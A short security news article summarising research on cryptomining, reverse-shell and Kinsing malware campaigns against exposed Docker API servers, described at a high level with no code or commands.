Researchers have spotted ongoing malicious campaigns in Docker honeypot targeting exposed Docker API port 2375. The attacks are linked to cryptominers and reverse shells on exposed servers.

Attacks on Docker installations

Uptycs Threat Research team detected the attacks that used base64-encoded commands to evade defense mechanisms. The team observed various types of attacks such as coinminer, shell script, and reverse shell.
  • The coinminer attack includes the use of various shell scripts to drop malicious components through the deployment of genuine Docker images on the servers exposed to the Docker API. 
  • Another type of cryptominer attack involves heavy obfuscation to evade static defenses. On executing a shell script, the XMRig miner gets downloaded from GitHub, and soon mining starts.
  • The third type of attack uses reverse shell attacks where attackers execute a reverse shell on the exposed servers.

Along with the above-mentioned attacks, there was another type of attack observed that included the Kinsing malware.

The Kinsing attacks

The most observed attack is by Kinsing, a malware family that was spotted in the *nix-based malware attacks. 
  • In Docker's honeypot, researchers observed large amounts of Kinsing-related attacks on the exposed servers. 
  • The malware includes various defense evasive mechanisms and commands with a rootkit to hide malicious activity. 
  • The main goal of the attackers is to mine cryptocurrency on the exposed servers.
  • The Kinsing shell script includes Docker-related commands to kill already running miner processes on the system.


Docker containers are now becoming a fundamental aspect of application development. Without proper protections, these servers become exposed and targeted by attackers to launch attacks. Thus, it is recommended to monitor Docker-related threats often and leverage threat intelligence for better protection.
Cyware Publisher